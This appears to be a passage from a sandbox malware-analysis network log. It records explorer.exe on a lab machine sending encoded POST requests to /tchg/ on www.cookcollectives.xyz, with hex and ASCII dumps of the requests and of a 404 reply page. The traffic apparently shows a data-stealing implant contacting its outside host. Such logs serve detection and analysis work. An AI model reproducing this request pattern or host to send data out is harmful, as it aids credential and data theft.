                                                                                                                    May 30, 2023 11:12:18.313935041 CEST1474INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                                                    Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    77192.168.11.2049836199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:20.726342916 CEST1475OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.cookcollectives.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.cookcollectives.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 79 30 4c 79 67 70 65 74 4c 4e 4c 62 49 38 51 78 32 68 57 4e 43 69 65 6e 56 5a 43 52 59 32 63 45 76 34 35 51 6c 59 4c 32 54 49 53 4b 4b 56 67 6e 77 64 56 68 55 59 65 69 39 72 70 47 4d 76 46 37 37 68 43 47 46 6b 58 70 76 6b 39 77 6f 6c 33 68 38 4b 66 4e 47 2d 36 43 74 76 44 79 4b 52 7e 56 75 2d 7e 5a 77 62 38 58 43 77 51 2d 46 63 6f 69 6c 47 37 50 43 63 56 67 33 61 35 6f 70 64 6f 59 77 48 63 48 61 31 6e 79 6b 39 68 58 65 33 70 7a 61 4c 75 2d 67 6d 64 5a 42 48 45 6c 61 52 62 43 69 6f 48 56 41 47 64 37 57 78 4f 46 7e 37 34 36 55 50 53 57 6a 73 6c 35 4c 6a 58 58 63 4c 74 75 54 50 48 7a 4c 6f 33 77 33 71 68 33 4f 35 5a 6e 6c 54 30 74 30 4f 6b 5a 76 30 6d 5f 44 64 64 55 7a 49 78 65 76 41 47 4f 79 51 44 78 73 4f 76 48 48 4a 4e 31 55 4d 78 65 69 6b 4d 2d 32 56 49 6d 57 72 6d 46 6b 5a 63 39 36 6c 4e 4b 37 46 41 31 50 4a 79 42 39 4a 73 47 6a 38 34 74 36 43 32 34 44 6a 79 4d 62 5f 39 72 48 6f 50 4a 58 69 71 6d 68 36 68 64 4e 6e 53 6d 39 54 39 32 6c 64 51 79 56 68 63 2d 28 43 66 37 69 72 71 75 53 61 46 57 4a 6a 73 41 75 71 49 70 46 55 76 39 31 4b 45 4c 56 66 47 34 6f 46 73 33 4c 36 49 73 39 52 30 77 4d 54 71 32 51 4d 65 37 30 61 28 44 5a 30 35 66 4c 34 55 6c 6a 59 53 4c 41 65 33 4d 77 59 34 4f 4c 65 54 74 66 35 48 63 33 30 35 75 35 49 4c 39 74 7a 33 5a 6d 30 46 53 37 45 53 65 34 63 39 66 73 6c 49 62 4e 7a 35 7a 55 78 6f 31 45 62 6c 6c 28 62 52 79 30 71 79 73 69 32 39 63 43 77 65 63 58 50 75 56 58 4d 58 7a 32 64 4e 4d 56 31 78 4e 73 5f 33 4b 50 54 6d 74 28 72 67 71 65 55 68 6e 51 6c 44 6a 4c 76 73 55 72 49 70 74 7a 59 32 6a 39 72 41 4b 77 6d 30 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=y0LygpetLNLbI8Qx2hWNCienVZCRY2cEv45QlYL2TISKKVgnwdVhUYei9rpGMvF77hCGFkXpvk9wol3h8KfNG-6CtvDyKR~Vu-~Zwb8XCwQ-FcoilG7PCcVg3a5opdoYwHcHa1nyk9hXe3pzaLu-gmdZBHElaRbCioHVAGd7WxOF~746UPSWjsl5LjXXcLtuTPHzLo3w3qh3O5ZnlT0t0OkZv0m_DddUzIxevAGOyQDxsOvHHJN1UMxeikM-2VImWrmFkZc96lNK7FA1PJyB9JsGj84t6C24DjyMb_9rHoPJXiqmh6hdNnSm9T92ldQyVhc-(Cf7irquSaFWJjsAuqIpFUv91KELVfG4oFs3L6Is9R0wMTq2QMe70a(DZ05fL4UljYSLAe3MwY4OLeTtf5Hc305u5IL9tz3Zm0FS7ESe4c9fslIbNz5zUxo1Ebll(bRy0qysi29cCwecXPuVXMXz2dNMV1xNs_3KPTmt(rgqeUhnQlDjLvsUrIptzY2j9rAKwm0.
                                                                                                                    May 30, 2023 11:12:21.005604029 CEST1477INHTTP/1.1 404 Not Found
                                                                                                                    Date: Tue, 30 May 2023 09:12:20 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4406
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                                                    May 30, 2023 11:12:21.005685091 CEST1478INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                                    Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                                                    May 30, 2023 11:12:21.005747080 CEST1479INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                    Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                                                    May 30, 2023 11:12:21.005825043 CEST1480INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                                                    Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    78192.168.11.2049837199.192.30.14780C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:23.413603067 CEST1486OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.cookcollectives.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.cookcollectives.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.cookcollectives.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 79 30 4c 79 67 70 65 74 4c 4e 4c 62 49 38 51 78 32 68 57 4e 43 69 65 6e 56 5a 43 52 59 32 63 45 76 34 35 51 6c 59 4c 32 54 49 61 4b 4c 6d 6f 6e 78 36 42 68 56 59 65 69 79 37 70 39 4d 76 46 79 37 68 61 43 46 6c 72 35 76 69 35 77 6f 53 72 68 38 5a 33 4e 44 2d 36 44 6e 50 44 77 4f 52 28 53 75 2d 6a 61 77 61 59 74 42 42 55 2d 45 65 77 69 30 41 7a 4d 64 38 56 35 33 61 35 30 69 39 6f 6d 77 48 4a 61 61 31 6a 79 6b 5f 56 58 65 46 52 7a 59 59 57 2d 37 6d 64 65 59 33 46 6c 44 42 62 42 69 6f 54 72 41 47 63 5a 57 77 4b 46 7e 35 77 36 56 4d 71 56 6a 4d 6c 35 49 6a 58 57 4e 62 68 71 54 4c 76 72 4c 6f 7a 77 33 71 4a 33 4d 5a 5a 6e 6a 79 30 73 33 75 6b 54 6c 55 6e 70 49 39 5a 63 7a 49 6c 77 76 42 69 4f 79 67 48 78 74 35 37 48 46 6f 4e 31 57 73 78 59 76 45 4d 54 28 31 49 69 57 72 32 33 6b 5a 38 74 36 6e 68 4b 30 45 67 31 61 62 4b 43 28 70 73 63 67 38 35 6c 7e 43 71 6b 44 69 44 4e 62 5f 39 37 48 70 37 4a 58 53 36 6d 67 2d 56 61 41 58 54 73 30 7a 38 69 38 74 4d 73 56 68 52 78 28 42 4f 32 69 73 61 75 53 36 46 57 5a 77 45 44 35 71 49 75 4e 30 76 56 78 4b 46 44 56 66 43 65 6f 41 55 4e 4c 4f 77 73 38 68 6b 77 47 6a 71 35 47 63 65 67 36 36 28 4a 49 6b 35 66 4c 34 49 78 6a 59 4f 4c 56 36 37 4d 28 4c 51 4f 4e 4f 76 74 54 5a 48 57 33 30 34 32 35 49 33 34 74 7a 4f 2d 6d 30 5a 34 37 48 7e 65 34 4e 74 66 68 41 30 59 47 6a 35 79 51 78 70 6a 41 62 35 32 28 61 39 71 30 70 62 62 69 45 35 63 59 77 4f 63 54 50 75 53 42 63 57 61 68 74 4e 61 48 46 39 72 73 37 76 61 50 54 6a 67 28 6f 51 71 50 69 63 67 50 6d 54 64 49 4d 6b 63 70 66 52 37 38 66 4f 53 6c 75 49 39 6a 67 63 53 31 46 6f 43 6f 58 58 66 42 56 4b 63 6e 33 75 45 5a 72 31 4f 50 4f 31 67 43 47 34 37 45 43 6e 43 65 76 6f 53 55 6a 30 5a 65 5f 33 56 61 57 41 70 58 47 65 35 34 6e 7a 76 76 7a 50 50 28 55 4b 4b 37 67 4e 56 30 59 6e 36 30 35 77 51 6f 6a 59 38 64 6e 62 71 69 6e 32 47 59 41 36 46 41 72 4a 74 47 42 6d 46 4a 49 65 33 4b 6f 71 2d 6f 54 30 42 52 4d 51 70 4e 6f 63 6d 6f 58 46 64 7a 57 42 37 73 4c 31 35 68 48 69 51 55 79 52 6e 4c 42 74 57 38 53 46 69 67 57 51 48 78 2d 52 31 36 55 7e 4d 6f 32 6b 56 69 6d 69 74 54 78 49 61 5a 4d 76 69 67 68 36 31 39 48 34 33 63 4e 79 34 6c 75 70 31 34 70 28 77 6b 31 4a 7a 45 7a 48 62 32 34 35 51 50 47 6b 38 35 7a 7e 36 70 6a 61 5a 54 58 61 79 74 76 38 41 28 35 38 5a 35 44 62 42 65 6f 51 5f 4e 54 35 77 77 44 72 30 4b 4c 58 5f 59 78 44 78 35 44 33 79 6a 6c 28 55 7e 54 47 6b 36 76 69 68 4c 39 39 30 30 63 48 6b 57 56 66 54 79 4c 38 33 6f 52 32 58 70 31 71 65 43 74 30 41 66 49 30 35 65 50 38 74 73 4b 45 70 6b 39 31 72 61 74 41 64 6d 49 6b 55 38 6c 58 77 5a 4d 36 32 53 4b 46 6c 6a 44 41 67 32 50 63 6e 65 39 75 66 6c 74 72 53 7e 35 63 6e 38 46 36 70 56 4d 73 43 52 47 35 33 44 32 6d 65 31 38 39 43 79 7a 50 59 75 46 37 67 28 37 44 35 5a 35 7a 37 39 2d 4d 77 6f 52 72 68 63 7a 4a 6c 28 53 7a 64 47 55 46 49 6c 48 50 52 72 65 4f 34 34 41 73 6f 61 4b 6b 6f 56 45 65 71 49 62 59 2d 31 30 56 66 59 4b 61 72 58 34 53 6b 42 31 4f 57 6a 46 41 50 36 55 53 71 46 37 47 6d 33 48 7a 44 52 4a 36 4a 31 58 4d 76 4d 56 7e 73 7e 4c 7e 55 75 62 75 65 4e 38 41 44 76 34 46 55 6d 4a 31 75 6f 56 73 72 77 31 6f 52 6c 6b 4a 5a 75 4d 51 39 55 45 44 53 70 4a 34 66 79 5a 42 46 75 58 34 47 59 62 75 37 72 52 6b 43 35 6e 66 67 28 65 4f 41 36 75 65 75 7e 6a 4b 79 62 65 4a 45 74 70 45 58 70 58 76 68 63 69 4b 6a 50 6b 5a 55 4d 4c 6e 61 6c 4d 79 6d 62 7a 63 4c 6b 55 59 70 4d 4d 74 75 61 31 32 68 5a 33 32 69 61 33 76 4d 44 35 63 34 4a 61 43 45 75 33 47 42 6a 47 6a 4c 56 75 6e 39 45 41 59 6b 6a 38 6c 39 76 44 4a 36 6f 4d 4d 76 52 62 4c 62 76 54 76 38 35 33 31 77 69 68 4b 71 4b 51 61 59 57 67 76 67 49 42 42 62 42 45 6a 67 7e 4d 65 7a 44 58 4d 55 6b 39 28 59 50 61 71 44 50 33 66 32 57 31 45 6c 44 42 34 4f 6e 62 33 67 44 57 67 52 4e 74 78 59 30 67 67 4d 50 76 7e 63 33 61 4a 41 31 6a 48 68 7e 57 69 33 50 67 4f 72 41 56 67 4b 66 54 53 31 41 49 4c 48 50 35 44 6a 56 6c 6e 6b 36 4b 49 36 4f 68 33 75 6f 69 44 59 42 5f 78 54 73 6a 4f 79 4c 48 63 50 28 34 4a 35 38 31 6d 38 48 64 69 35 52 48 6b 53 73 4f 51 75 57 63 38 5a 69 74 51 36 56 43 4c 61 54 4f 75 38 33 42 6b 62 73 53 61 50 42 5f 34 75 43 43 31 43 4b
                                                                                                                    Data Ascii: O0qEM=y0LygpetLNLbI8Qx2hWNCienVZCRY2cEv45QlYL2TIaKLmonx6BhVYeiy7p9MvFy7haCFlr5vi5woSrh8Z3ND-6DnPDwOR(Su-jawaYtBBU-Eewi0AzMd8V53a50i9omwHJaa1jyk_VXeFRzYYW-7mdeY3FlDBbBioTrAGcZWwKF~5w6VMqVjMl5IjXWNbhqTLvrLozw3qJ3MZZnjy0s3ukTlUnpI9ZczIlwvBiOygHxt57HFoN1WsxYvEMT(1IiWr23kZ8t6nhK0Eg1abKC(pscg85l~CqkDiDNb_97Hp7JXS6mg-VaAXTs0z8i8tMsVhRx(BO2isauS6FWZwED5qIuN0vVxKFDVfCeoAUNLOws8hkwGjq5Gceg66(JIk5fL4IxjYOLV67M(LQONOvtTZHW30425I34tzO-m0Z47H~e4NtfhA0YGj5yQxpjAb52(a9q0pbbiE5cYwOcTPuSBcWahtNaHF9rs7vaPTjg(oQqPicgPmTdIMkcpfR78fOSluI9jgcS1FoCoXXfBVKcn3uEZr1OPO1gCG47ECnCevoSUj0Ze_3VaWApXGe54nzvvzPP(UKK7gNV0Yn605wQojY8dnbqin2GYA6FArJtGBmFJIe3Koq-oT0BRMQpNocmoXFdzWB7sL15hHiQUyRnLBtW8SFigWQHx-R16U~Mo2kVimitTxIaZMvigh619H43cNy4lup14p(wk1JzEzHb245QPGk85z~6pjaZTXaytv8A(58Z5DbBeoQ_NT5wwDr0KLX_YxDx5D3yjl(U~TGk6vihL9900cHkWVfTyL83oR2Xp1qeCt0AfI05eP8tsKEpk91ratAdmIkU8lXwZM62SKFljDAg2Pcne9ufltrS~5cn8F6pVMsCRG53D2me189CyzPYuF7g(7D5Z5z79-MwoRrhczJl(SzdGUFIlHPRreO44AsoaKkoVEeqIbY-10VfYKarX4SkB1OWjFAP6USqF7Gm3HzDRJ6J1XMvMV~s~L~UubueN8ADv4FUmJ1uoVsrw1oRlkJZuMQ9UEDSpJ4fyZBFuX4GYbu7rRkC5nfg(eOA6ueu~jKybeJEtpEXpXvhciKjPkZUMLnalMymbzcLkUYpMMtua12hZ32ia3vMD5c4JaCEu3GBjGjLVun9EAYkj8l9vDJ6oMMvRbLbvTv8531wihKqKQaYWgvgIBBbBEjg~MezDXMUk9(YPaqDP3f2W1ElDB4Onb3gDWgRNtxY0ggMPv~c3aJA1jHh~Wi3PgOrAVgKfTS1AILHP5DjVlnk6KI6Oh3uoiDYB_xTsjOyLHcP(4J581m8Hdi5RHkSsOQuWc8ZitQ6VCLaTOu83BkbsSaPB_4uCC1CKEFCCp3qGRGZpK(U9UTb~iIkQM8ZLnprhaCcTcqb9IPWTRupEg2AhpZaKVUYSOnJkJ1qGemxKRtqXpxo2yn_lLthG4JIJqjQna0_8p9iWvrfVEIIb-QYSV77wOGsYYLMifkiL-qBeXk8HNHic6wrOWy581hC60mfvBKwZEPo7t6u(xcytx1zxV63tBjYiNcV6xa63OMo(ek_gB4ASFcetXf60cz-U_wX6UYfDzFndJFzuPVTYLvaO1tGZale2q0BwoOZNsXg6v~Nh3ZyJOWvhkIW(eyU80A2rnjUVNoYiUacSfXH4N5Z04cU5OxZyCkGbEuNcZm1i4t41lvek1RgHQaqokC69fmrXX6RAPSrst44q1YDudwQ05crNrcSlk1em5pLBNiOYOK9jhzam2CYRkP6MI9IO55O9Cn_hcd4TL91eHFO2aZsf_8fLkLxNmEfVTmPhdRnLjZdtjHg14VVN7d-dJq1sNMwM0CaZsUhNXENfStIf-WyBisPyCLJ87nTaHIlZSmIIrJZGPUSJruUBetJgMPt1eOZUVdA(aJ4nqv0KrzOjPG8NdQDUPXkNHvjcRfNIt9DNaV7iC9VZXltqnqMK5vO72Pje88y2-I2B9C54jNkyoE0CBmvQBnBHs7XzS9UGJrIoUwIQ_1NMpeNP-Ed6w7f(b7uUzM8sx6D3D4g7xlyJoDCg_5u1HZ3VfykGylaY0fptmPj8L0mFu1J7TOiPRQHfcwlC_1MahMSsl1e0HGUFJ(quAD7wVPE3xQzcVA1~Ttw1FQxZaYTZvWuujFihcclHiWkdHh9E2fxFdTksAPodjvrZqGNjKr4YS(kQeyT7H4YZqyNwVMJPcdotPaODRsMhKHLQyCGve(1zhSD5hZ9GNEj3CTsGPB5dpe4Vfef6cZdhQngYAmdcS7U0yZy3po0IXqUL5jpaDN_K3ZqrKuKi5ou6o7Z(02Ckr1KfIga5bJJEnZ-c8qY5375qHsasIMSV6A4vrD91BIQESb5Unsc2J4LG66OM68Tn56Z5JVx6KDoEHDY3YIhH4Jy2ubUbQ31lycHdIgoHrSu7SOibVGQqCDnz56dnc8LiiCoQdmJ8uOaD5VG4aUK3xwWIIxM~s4VOZuqJj7sqZ62M5J0LYPxbKBPyA3TRsAZYNeKvvJxXbPNw-7GFs07o9YAY3dH2xAOFUnCxkIKJujf~5JiDSFI1ilxNrVdoyrbuqWEDss5u33NK9SnHc2kD56w2HMMtdJ38lEXSSwkDgaVM3MpTBpJlH4wcH~4v7OrO0UEFPcZXTTUW-R58k4SigXNqv7Sp75ajBRGJaf9~MKMA_00TTqxreg0aBn5pKs2bBcjwykCqU9u18ZNHx~Aq-ff2ERkC0u93ZX9iaVPfEbo4yJmVwVZaaBwVitUG5z8AZQzly(lUXlFE_eb(OD_DMIdKkusynjmDYHjk6ppoAQmML5BfPx-NFyYBBCfY6XBUmTmtujZ1feDq2qyuMcxq3kAV9j_sTW36m3NVH1V(VCwotkDiGNn(hndwpKIvHhOPhtjDk~12_nS~FLxAdEpb3plQbFbxs7uz-qZ3DJ2wqZWvwusEZMD2zToDmg9hY8ITU8dcKJvnQ8UV7Fd7LWRDQNU4SFYWRkRmD2WjJyUH6MD~NCTLGBsMUrlHYgkyX6k5MJjj3ZzL-bacNLfHgB7SMVgENVJlI1BP3i9zTqygz1s7_fX2sG2f1Y25_j0fMUvRtHqpiy6ReYbogGXYPFf(mP_FIbbjh7MzqdEEY8IHLdT(0SpLOWFkpkmZ-1Wd6H3zgucwpbC8R(27vKoSGdi3uOPuNTqBC30H0wZ7xts1CNGBDFRtGGFNP8yqUEroOBYB9PhaCkmlaz8CWYkRp(OCcSZuAWRWJym95LXm_Okd9wuF7ZUj1u5L_Whh1~ZF9174ULVtTYwCDW8v1bxxKDxGy~LSL4Er1Ui9r1Kkpzf64Nu2woxHPvafIZX1Rzc6xgs7J7HWeZq0JWJFA9leHELTzGWc9QMEHD2iUR3dNg_BxuWW4dmnTPRvklbJouCLuhXk-qodl2LraFIDPzJJxPvSghoqdsLczD9nhy1L6xZJmfMXO2looB1Qo9CAdOpakwaC0Ccrx9zflRWJie3V8YTPNEvHY(dDOVGjCX-j5rTc0OXY8l_cYj6HmJAfzVGZturZL1IlmBAnYwFd-K6fKrB~oXLz6didDqlXbTg8LfHhMy_Otl3GxbVHO29s9FawSc2VJBDkse4SyvJI3Rw5FYQSw2vCfzyORJPSvH_4gMXDkP5nt1bZF8AmLTLgHdj~aEBTt2f6x63uUnapIY99Q1AYYbNWxwgCDZIbcC5IaIKTwd2kVzP(PKx~BPNrb5PS4SUgBO-m8qFU9CU3hUxzsVGXwspTJZcZqYPnKKKw2UXJTCZnL2pmkDdBEuBRhGRv4w7levBPYpIYELCcr7glumyGHNyyC5gp6UtlHw7bzmklrf1qM8VegqZNleNPcDCEGGTKJEpUcJqzUSHIyFjdUaXYBxkbLAVvIfdqAsHmLqy(bmce01-3x87~0TFiQx_a2ExNg(v6xJBe0855_I-TJ5e0AtRLtkMcpqsYlKVg7rzWmfnaTar49LMvcIRTRoUHksLWEZyXeSK4SZBZ626p_ZnE2I8M-LGsz4D0Ce8JXkljiUmvE~MchfRpbssaBeWCPL_6CjKqy(Zf0xNR5Z6alBUkhlAmHx6lhzu2tVDOeH3
                                                                                                                    May 30, 2023 11:12:23.413707018 CEST1493OUTData Raw: 4c 6d 32 78 7a 56 38 43 67 45 69 69 68 79 79 79 77 71 71 38 4c 68 52 75 7a 70 52 71 68 6f 39 58 59 57 6c 39 44 33 62 46 73 4a 34 7e 66 79 49 39 6d 48 61 73 54 72 69 6a 4a 66 5f 5a 31 4d 4c 47 4e 52 54 75 61 6a 37 5a 6d 70 4a 37 53 6b 4a 70 61 4d
                                                                                                                    Data Ascii: Lm2xzV8CgEiihyyywqq8LhRuzpRqho9XYWl9D3bFsJ4~fyI9mHasTrijJf_Z1MLGNRTuaj7ZmpJ7SkJpaMoiwXXpMNo~vvIU8A5R-aFljnaC-x-TEpKf3injibH~sPg4jaRDCQhqGAeyx97Tas5oXqzogkdp9iMGnvVtTjRONijeWZXQGbchpUJbsZpJO24ramRXXYMCs8zim0BPhkZc6h1gVtFAFV10V8CeXw6ToUcSeEsnVMC
                                                                                                                    May 30, 2023 11:12:23.583750010 CEST1496OUTData Raw: 47 71 37 4f 68 4e 48 31 68 6a 39 6b 6f 58 56 49 66 50 51 41 2d 50 71 45 66 6a 78 58 54 4e 38 57 73 4e 56 7a 76 75 72 39 55 49 53 7e 2d 57 41 36 39 6e 78 6b 36 77 4d 61 6d 5a 59 6f 46 6f 35 4f 32 71 4c 75 61 47 72 42 32 47 34 43 38 63 45 59 74 69
